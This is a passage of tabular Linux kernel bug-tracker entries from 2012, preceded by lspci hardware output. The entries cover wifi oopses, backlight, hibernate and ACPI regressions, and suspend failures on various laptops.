Giga-byte Technology Device 5004 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 64 bytes Interrupt: pin B routed to IRQ 17 Region 0: Memory at fe02d000 (32-bit, non-prefetchable) [size=256] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Bridge: PM- B3+ Capabilities: [e4] Debug port: BAR=1 offset=00e0 Kernel driver in use: ehci_hcd 00:13.0 USB controller: Advanced Micro Devices [AMD] Hudson USB OHCI Controller (rev 11) (prog-if 10 [OHCI]) Subsystem: Giga-byte Technology Device 5004 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 18 Region 0: Memory at fe02c000 (32-bit, non-prefetchable) [size=4K] Kernel driver in use: ohci_hcd 00:13.2 USB controller: Advanced Micro Devices [AMD] Hudson USB EHCI Controller (rev 11) (prog-if 20 [EHCI]) Subsystem: Giga-byte Technology Device 5004 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 64 bytes Interrupt: pin B routed to IRQ 17 Region 0: Memory at fe02b000 (32-bit, non-prefetchable) [size=256] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Bridge: PM- B3+ Capabilities: [e4] Debug port: BAR=1 offset=00e0 Kernel driver in use: ehci_hcd 00:14.0 SMBus: Advanced Micro Devices [AMD] Hudson SMBus Controller (rev 13) Subsystem: Giga-byte Technology Device 4385 Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- 00:14.1 IDE interface: Advanced Micro Devices [AMD] Hudson IDE Controller (prog-if 8a [Master SecP PriP]) Subsystem: Giga-byte Technology Device 5002 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 64 bytes Interrupt: pin B routed to IRQ 255 Region 0: I/O ports at 01f0 [size=8] Region 1: I/O ports at 03f4 [size=1] Region 2: I/O ports at 0170 [size=8] Region 3: I/O ports at 0374 [size=1] Region 4: I/O ports at fa00 [size=16] 00:14.2 Audio device: Advanced Micro Devices [AMD] Hudson Azalia Controller (rev 01) Subsystem: Giga-byte Technology Device a002 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=slow &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 16 Region 0: Memory at fe024000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=55mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: snd_hda_intel 00:14.3 ISA bridge: Advanced Micro Devices [AMD] Hudson LPC Bridge (rev 11) Subsystem: Advanced Micro Devices [AMD] nee ATI Device 439d Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 00:14.4 PCI bridge: Advanced Micro Devices [AMD] Hudson PCI Bridge (rev 40) (prog-if 01 [Subtractive decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop+ ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 Bus: primary=00, secondary=02, subordinate=02, sec-latency=64 I/O behind bridge: 0000d000-0000dfff Memory behind bridge: fdb00000-fdbfffff Prefetchable memory behind bridge: fde00000-fdefffff Secondary status: 66MHz- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- 00:14.5 USB controller: Advanced Micro Devices [AMD] Hudson USB OHCI Controller (rev 11) (prog-if 10 [OHCI]) Subsystem: Giga-byte Technology Device 5004 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 64 bytes Interrupt: pin C routed to IRQ 18 Region 0: Memory at fe02a000 (32-bit, non-prefetchable) [size=4K] Kernel driver in use: ohci_hcd 00:16.0 USB controller: Advanced Micro Devices [AMD] Hudson USB OHCI Controller (rev 11) (prog-if 10 [OHCI]) Subsystem: Giga-byte Technology Device 5004 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 18 Region 0: Memory at fe029000 (32-bit, non-prefetchable) [size=4K] Kernel driver in use: ohci_hcd 00:16.2 USB controller: Advanced Micro Devices [AMD] Hudson USB EHCI Controller (rev 11) (prog-if 20 [EHCI]) Subsystem: Giga-byte Technology Device 5004 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 64 bytes Interrupt: pin B routed to IRQ 17 Region 0: Memory at fe028000 (32-bit, non-prefetchable) [size=256] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Bridge: PM- B3+ Capabilities: [e4] Debug port: BAR=1 offset=00e0 Kernel driver in use: ehci_hcd 00:18.0 Host bridge: Advanced Micro Devices [AMD] Family 12h/14h Processor Function 0 (rev 43) Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- 00:18.1 Host bridge: Advanced Micro Devices [AMD] Family 12h/14h Processor Function 1 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- 00:18.2 Host bridge: Advanced Micro Devices [AMD] Family 12h/14h Processor Function 2 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- 00:18.3 Host bridge: Advanced Micro Devices [AMD] Family 12h/14h Processor Function 3 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Capabilities: [f0] Secure device &lt;?&gt; Kernel driver in use: k10temp Kernel modules: k10temp 00:18.4 Host bridge: Advanced Micro Devices [AMD] Family 12h/14h Processor Function 4 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- 00:18.5 Host bridge: Advanced Micro Devices [AMD] Family 12h/14h Processor Function 6 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- 00:18.6 Host bridge: Advanced Micro Devices [AMD] Family 12h/14h Processor Function 5 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- 00:18.7 Host bridge: Advanced Micro Devices [AMD] Family 12h/14h Processor Function 7 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- 01:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8111/8168B PCI Express Gigabit Ethernet controller (rev 06) Subsystem: Giga-byte Technology GA-EP45-DS5 Motherboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 41 Region 0: I/O ports at ee00 [size=256] Region 2: Memory at fdcff000 (64-bit, prefetchable) [size=4K] Region 4: Memory at fdcf8000 (64-bit, prefetchable) [size=16K] Capabilities: [40] Power Management version 3 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 NoSoftRst+ PME-Enable- DSel=0 DScale=0 PME- Capabilities: [50] MSI: Enable+ Count=1/1 Maskable- 64bit+ Address: 00000000fee0700c Data: 4161 Capabilities: [70] Express (v2) Endpoint, MSI 01 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;512ns, L1 &lt;64us ExtTag- AttnBtn- AttnInd- PwrInd- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 4096 bytes DevSta: CorrErr+ UncorrErr- FatalErr- UnsuppReq+ AuxPwr+ TransPend- LnkCap: Port #0, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 unlimited, L1 &lt;64us ClockPM+ Surprise- LLActRep- BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- DevCap2: Completion Timeout: Range ABCD, TimeoutDis+ DevCtl2: Completion Timeout: 50us to 50ms, TimeoutDis- LnkCtl2: Target Link Speed: 2.5GT/s, EnterCompliance- SpeedDis-, Selectable De-emphasis: -6dB Transmit Margin: Normal Operating Range, EnterModifiedCompliance- ComplianceSOS- Compliance De-emphasis: -6dB LnkSta2: Current De-emphasis Level: -6dB, EqualizationComplete-, EqualizationPhase1- EqualizationPhase2-, EqualizationPhase3-, LinkEqualizationRequest- Capabilities: [b0] MSI-X: Enable- Count=4 Masked- Vector table: BAR=4 offset=00000000 PBA: BAR=4 offset=00000800 Capabilities: [d0] Vital Product Data Unknown small resource type 00, will not decode more. Capabilities: [100 v1] Advanced Error Reporting UESta: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol- UEMsk: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol- UESvrt: DLP+ SDES+ TLP- FCP+ CmpltTO- CmpltAbrt- UnxCmplt- RxOF+ MalfTLP+ ECRC- UnsupReq- ACSViol- CESta: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ CEMsk: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ AERCap: First Error Pointer: 00, GenCap+ CGenEn- ChkCap+ ChkEn- Capabilities: [140 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed- WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=ff Status: NegoPending- InProgress- Capabilities: [160 v1] Device Serial Number 01-00-00-00-68-4c-e0-00 Kernel driver in use: r8169 02:06.0 Network controller: Ralink corp. RT2561/RT61 rev B 802.11g Subsystem: Ralink corp. Device 2561 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=slow &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 20 Region 0: Memory at fdbf8000 (32-bit, non-prefetchable) [size=32K] Capabilities: [40] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: rt61pci Kernel modules: rt61pci Related: http://forums.gentoo.org/viewtopic-p-7084528.html</t>
  </si>
  <si>
    <t>Kernel Oops during boot with ASUS WL-130g (Ralink based) PCI wifi card installed</t>
  </si>
  <si>
    <t>3.5.0-030500rc6-generic</t>
  </si>
  <si>
    <t>2012-07-10 19:20 UTC</t>
  </si>
  <si>
    <t>Leon Hall</t>
  </si>
  <si>
    <t>2012-07-25 11:15 UTC</t>
  </si>
  <si>
    <t>Created attachment 75191 [details] full dmesg output Note: bug originally filed at https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1022351 kernel version: Linux version 3.5.0-030500rc6-generic (apw@gomeisa) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #201207072135 SMP Sun Jul 8 01:35:57 UTC 2012 This occurs at boot time with the ASUS WL-130g installed but does not occur with the device removed. I have tried previous versions of the 3.5 branch, all with the same results.</t>
  </si>
  <si>
    <t>no backlight control in Acer Aspire One D270</t>
  </si>
  <si>
    <t>3.2.0-25</t>
  </si>
  <si>
    <t>2012-07-11 10:27 UTC</t>
  </si>
  <si>
    <t>Leon Wilk</t>
  </si>
  <si>
    <t>2013-02-08 17:50 UTC</t>
  </si>
  <si>
    <t>Created attachment 75221 [details] various dumps (acpidump, iasl, fwts, dmidecode, dmesg etc) Backlight can't be controlled in Aspire One D270. booting with acpi_backlight=vendor doesn't change a thing. /sys/class/backlight is empty. This was reported in https://bugs.launchpad.net/ubuntu/+source/linux/+bug/974806 but it appears like the reporter never followed up with the recommendation to upstream the bug (I didn't find anything on "D270 backlight" on bugzilla.kernel.org), so I'm doing it here. My system: Ubuntu 12.04 LTS, kernel 3.2.0-25-generic-pae The previous reporter checked it with 3.2.0-22.35 /sys/class/backlight is empty. /proc/acpi/video does not exist 'ACPI: Video' doesn't appear in dmesg. Attaching all kinds of dumps as recommended by https://wiki.kubuntu.org/Kernel/Debugging/Backlight</t>
  </si>
  <si>
    <t>hibernate stopped to work</t>
  </si>
  <si>
    <t>v3.5-rc7</t>
  </si>
  <si>
    <t>2012-07-15 21:57 UTC</t>
  </si>
  <si>
    <t>My thinkpad510 fails to thaw after hibernation, but freezes instead. Bisecting showed commit 5baefd6d84163443215f4a99f6a20f054ef11236 Author: John Stultz &lt;johnstul@us.ibm.com&gt; Date: Tue Jul 10 18:43:25 2012 -0400 hrtimer: Update hrtimer base offsets each hrtimer_interrupt as the first bad commit. v3.5-rc7 worked with this commit reverted. I attach .config. Regards, Martin</t>
  </si>
  <si>
    <t>lpc_ich: Resource conflict(s) found affecting iTCO_wdt</t>
  </si>
  <si>
    <t>3.5.0-5</t>
  </si>
  <si>
    <t>2012-07-21 08:52 UTC</t>
  </si>
  <si>
    <t>dino99</t>
  </si>
  <si>
    <t>2014-06-12 19:10 UTC</t>
  </si>
  <si>
    <t>45391 45851 45871 77371</t>
  </si>
  <si>
    <t>This is with an Asus P5WDH (ICH7R) on Ubuntu Quantal i386 system dmesg: ACPI Warning: 0x00000830-0x00000833 SystemIO conflicts with Region \SMIE 1 (20120320/utaddress-251) [ 15.146991] ACPI Warning: 0x00000830-0x00000833 SystemIO conflicts with Region \_SB_.PCI0.SBRG.SMIE 2 (20120320/utaddress-251) [ 15.146995] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 15.146997] lpc_ich: Resource conflict(s) found affecting iTCO_wdt [ 15.147005] ACPI Warning: 0x00000480-0x000004bf SystemIO conflicts with Region \_SB_.PCI0.SBRG.GPIO 1 (20120320/utaddress-251) [ 15.147009] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 15.147010] lpc_ich: Resource conflict(s) found affecting gpio_ich Previous kernel discussion: https://lkml.org/lkml/2012/2/7/401 Launchpad report: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1027370</t>
  </si>
  <si>
    <t>Brightness control keys not working on HP 2510p</t>
  </si>
  <si>
    <t>3.4 and newest</t>
  </si>
  <si>
    <t>2012-07-24 09:15 UTC</t>
  </si>
  <si>
    <t>Mateusz Łukasik</t>
  </si>
  <si>
    <t>2013-02-08 17:48 UTC</t>
  </si>
  <si>
    <t>Hardware: HP Compaq 2510p Description: Debian GNU/Linux unstable (sid) Release: unstable On kernel newest than 3.4 version brigthness control key aren't working. The last one version if that was working is 3.3.8. Report from apci_listen on 3.2.23: video/brightnessdown BRTDN 00000087 00000000 video/brightnessup BRTUP 00000086 00000000 On new mainline version 3.5 only this keys don't working. Launchpad link: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1021267</t>
  </si>
  <si>
    <t>[REGRESSION] [BISECTED] ACPI event stop to be detected</t>
  </si>
  <si>
    <t>2012-07-26 14:20 UTC</t>
  </si>
  <si>
    <t>2015-05-13 08:23 UTC</t>
  </si>
  <si>
    <t>This report follow ubuntu bug from here: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/908825 This is the resume of the launchpad report and the suspected problem: I've a Clevo M720 notebook rebranded as Santech T45. All kernel from 2.6.38 and before support my laptop hotkey without extra set up. From 2.6.39 and following acpi support is broken. For example, with newer kernel, there are not recognized event like: - the ac_adapter plug and unplug - changing battery charging/discharging status event - suspend button* - backlight hotkey event* - low power mode button* - lid open/close The bug is reproducible booting the laptop with a kernel from 2.6.38 and older and affect all most diffused distribution (debian, fedora, ubuntu, etc.) when using newer kernel. Using acpi_event command I've saved the output for low power mode button, backlight up and down and suspend button: #: acpi_listen processor CPU0 00000080 00000003 processor CPU0 00000081 00000000 processor CPU1 00000080 00000003 processor CPU1 00000081 00000000 processor CPU0 00000080 00000000 processor CPU0 00000081 00000000 processor CPU1 00000080 00000000 processor CPU1 00000081 00000000 video LCD 00000087 00000000 video LCD 00000086 00000000 button/sleep SLPB 00000080 00000002 After kernel bisection, I've found the first commit that have caused the regression: 6dfad339645247c9deb553e4d68e21211ddc61bd is the first bad commit commit 6dfad339645247c9deb553e4d68e21211ddc61bd Author: Lin Ming &lt;email address hidden&gt; Date: Mon Feb 14 15:29:34 2011 +0800 ACPICA: GPE detect optimization - ignore unused GPE registers This optimization will simply ignore GPE registers that contain no enabled GPEs - there is no need to read the register. ACPICA bugzilla 884. http://www.acpica.org/bugzilla/show_bug.cgi?id=884 Signed-off-by: Lin Ming &lt;email address hidden&gt; Signed-off-by: Bob Moore &lt;email address hidden&gt; Signed-off-by: Len Brown &lt;email address hidden&gt; :040000 040000 8c25abddf22c9740402624bd582f3c87bfe9fc4f e40ed2fa28b82990cc8fb147f61841fd6400e711 M drivers</t>
  </si>
  <si>
    <t>Wrong ACPI event sent when unplug the AC on thinkpad e530</t>
  </si>
  <si>
    <t>3.5.0 3.6.8 3.7.* 3.8.6 3.9-rc6</t>
  </si>
  <si>
    <t>2012-07-27 16:09 UTC</t>
  </si>
  <si>
    <t>Enrico Tagliavini</t>
  </si>
  <si>
    <t>2013-05-27 13:36 UTC</t>
  </si>
  <si>
    <t>Created attachment 76261 [details] acpi dump, dmesg and syslogs When I boot the computer with the AC plugged and then unplug it the system doesn't always catch the change. I run KDE 4.8 and its power management still says the AC is still connected. KDE relies on upower so on ACPI IIRC. I done some edit to the default acpid scripts to be more verbose (it is attached with the other stuff). What I see when I unplug the AC is: ac_adapter ACPI0003:00 00000080 00000001 which is indeed the wrong event! This event is the one when you plugin the AC. I checked /sys/class/power_supply/AC/online and it says 0, so the change is detected correctly. When I boot the computer without the AC attached the correct state is recognized by ACPI and KDE. If I insert the AC and then unplug it again the issue sometimes happens again. This is a thinkpad e530 (edge series) computer running gentoo linux (mostly the stable branch) with kernel gentoo-source-3.5.0. I can attach my kernel config if needed. I think this issue is caused by the EC to become confused by something the kernel does. For example in this moment when the AC detector works the F1-12 keys and the multimedia keys are swapped! I have the legacy setting in the BIOS (meaning if I hit the F1 key I get the F1 key, not the Mute speaker even generated), but still sometimes the settings swaps at runtime! I have attached a tar archive (sorry but they are a lot of files) with acpidump binary output, dmesg after a fresh boot from battery and AC and the syslog when switching from the AC to the battery (from an AC boot) and from battery to AC (from a battery boot).</t>
  </si>
  <si>
    <t>MSI EX700 laptop doesn't wake up from suspend to RAM.</t>
  </si>
  <si>
    <t>2012-07-28 03:01 UTC</t>
  </si>
  <si>
    <t>mikewhatever</t>
  </si>
  <si>
    <t>2013-04-08 01:10 UTC</t>
  </si>
  <si>
    <t>Suspends immediately using the GUI or pm-suspend. Sleep light is flashing, system is otherwise powered off. I press the power button, the system powers on, then off, then on again, on its own. The screen remains blank, and I have to power it off and back on, and then it boots normally (not a resume). I use Ubuntu 12.04 with the 3.2.0-27-generic kernel, and have also tested with the mainline version linux-image-3.4.0-030400-generic-pae_3.4.0-030400.201205210521_i386. Here is the original bug report on launchpad: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1017291</t>
  </si>
  <si>
    <t>kernel panic in iwlwifi on enabling wireless from rfkill</t>
  </si>
  <si>
    <t>3.5.0</t>
  </si>
  <si>
    <t>2012-08-03 12:32 UTC</t>
  </si>
  <si>
    <t>Denis Lisov</t>
  </si>
  <si>
    <t>Reproducing: - turn on the laptop - disable wireless with hardware button - enable wireless with hardware button Results in kernel panic BUG: unable to handle kernel NULL pointer dereference at (null) IP: [&lt;ffffffffa01cdef8&gt;] ieee80211_ave_rssi+0x8/0x40 [mac80211] &lt;several lines skipped, see attached screen photo&gt; Call Trace: &lt;IRQ&gt; [&lt;ffffffffa01f07fa&gt;] iwlagn_bt_coex_profile_notif+0xda/0x240 [iwlwifi] [&lt;ffffffffa01f81ab&gt;] iwl_rx_dispatch+0xbb/0xe0 [iwlwifi] [&lt;ffffffffa0203320&gt;] iwl_irq_tasklet+0x520/0x8c0 [iwlwifi] &lt;furtherer lines available on the photo&gt; System: MSI GE60 0NC laptop (Ivy Bridge, Wireless-N 135) Gentoo Linux (kernel vanilla 3.5.0, linux-firmware 20120719) # lspci 00:00.0 Host bridge: Intel Corporation 3rd Gen Core processor DRAM Controller (rev 09) 00:01.0 PCI bridge: Intel Corporation Xeon E3-1200 v2/3rd Gen Core processor PCI Express Root Port (rev 09) 00:02.0 VGA compatible controller: Intel Corporation 3rd Gen Core processor Graphics Controller (rev 09) 00:14.0 USB controller: Intel Corporation 7 Series/C210 Series Chipset Family USB xHCI Host Controller (rev 04) 00:16.0 Communication controller: Intel Corporation 7 Series/C210 Series Chipset Family MEI Controller #1 (rev 04) 00:1a.0 USB controller: Intel Corporation 7 Series/C210 Series Chipset Family USB Enhanced Host Controller #2 (rev 04) 00:1b.0 Audio device: Intel Corporation 7 Series/C210 Series Chipset Family High Definition Audio Controller (rev 04) 00:1c.0 PCI bridge: Intel Corporation 7 Series/C210 Series Chipset Family PCI Express Root Port 1 (rev c4) 00:1c.1 PCI bridge: Intel Corporation 7 Series/C210 Series Chipset Family PCI Express Root Port 2 (rev c4) 00:1c.2 PCI bridge: Intel Corporation 7 Series/C210 Series Chipset Family PCI Express Root Port 3 (rev c4) 00:1c.3 PCI bridge: Intel Corporation 7 Series/C210 Series Chipset Family PCI Express Root Port 4 (rev c4) 00:1d.0 USB controller: Intel Corporation 7 Series/C210 Series Chipset Family USB Enhanced Host Controller #1 (rev 04) 00:1f.0 ISA bridge: Intel Corporation HM76 Express Chipset LPC Controller (rev 04) 00:1f.2 SATA controller: Intel Corporation 7 Series Chipset Family 6-port SATA Controller [AHCI mode] (rev 04) 00:1f.3 SMBus: Intel Corporation 7 Series/C210 Series Chipset Family SMBus Controller (rev 04) 01:00.0 VGA compatible controller: NVIDIA Corporation Device 0fd1 (rev ff) 03:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8111/8168B PCI Express Gigabit Ethernet controller (rev 06) 04:00.0 Unassigned class [ff00]: Realtek Semiconductor Co., Ltd. RTS5209 PCI Express Card Reader (rev 01) 04:00.1 SD Host controller: Realtek Semiconductor Co., Ltd. RTS5209 PCI Express Card Reader (rev 01) 05:00.0 Network controller: Intel Corporation Centrino Wireless-N 135 (rev c4)</t>
  </si>
  <si>
    <t>[BISECTED]iwlwifi does not load  if powersave for pci devices is active</t>
  </si>
  <si>
    <t>3.6-rc1</t>
  </si>
  <si>
    <t>2012-08-03 22:00 UTC</t>
  </si>
  <si>
    <t>after echo auto &gt; /sys/bus/pci/devices/0000:00:1c.1/power/control iwlwifi cannot be loaded. modprobe iwlwifi gives iwlwifi 0000:03:00.0: pci_enable_msi failed(0Xffffffea) iwlwifi 0000:03:00.0: bad EEPROM/OTP signature, type=OTP, EEPROM_GP=0x00000007 iwlwifi 0000:03:00.0: EEPROM not found, EEPROM_GP=0xffffffff iwlwifi 0000:03:00.0: Unable to init EEPROM This is on a Thinkpad510 with radio chip 03:00.0 Network controller: Intel Corporation Centrino Ultimate-N 6300 (rev 35) The device above is 00:1c.1 PCI bridge: Intel Corporation 5 Series/3400 Series Chipset PCI Express Root Port 2 (rev 06) The last commit tested is d8579fd834de224d2833ce2e82e0f691cc67e8f7 Fri Aug 3 14:10:00 2012 -0700 Regards, Martin</t>
  </si>
  <si>
    <t>resume from hibernate fails when "Suspend to RAM and standby" is disabled</t>
  </si>
  <si>
    <t>3.5.[01]</t>
  </si>
  <si>
    <t>2012-08-13 23:13 UTC</t>
  </si>
  <si>
    <t>2013-04-12 05:49 UTC</t>
  </si>
  <si>
    <t>The system in question can't suspend to ram, resume results in a reset and the system hanging in a broken bios (power off required). Hibernate, however, works, but only, if CONFIG_SUSPEND=y and CONFIG_SUSPEND_FREEZER=y, otherwise resume from hibernate fails with two displays full of vertical bars and an otherwise fully locked up system. The difference, as far as I can remember, is that if both options are set these vertical bars appear twice shortly on the main display during hibernation, when the options are not set they don't seem to appear. The system is an Ivy Bridge system using the integrated HD4000 graphics, so i915 is in use. The behavior is the same with 3.5.0 and 3.5.1. Kernel config attached.</t>
  </si>
  <si>
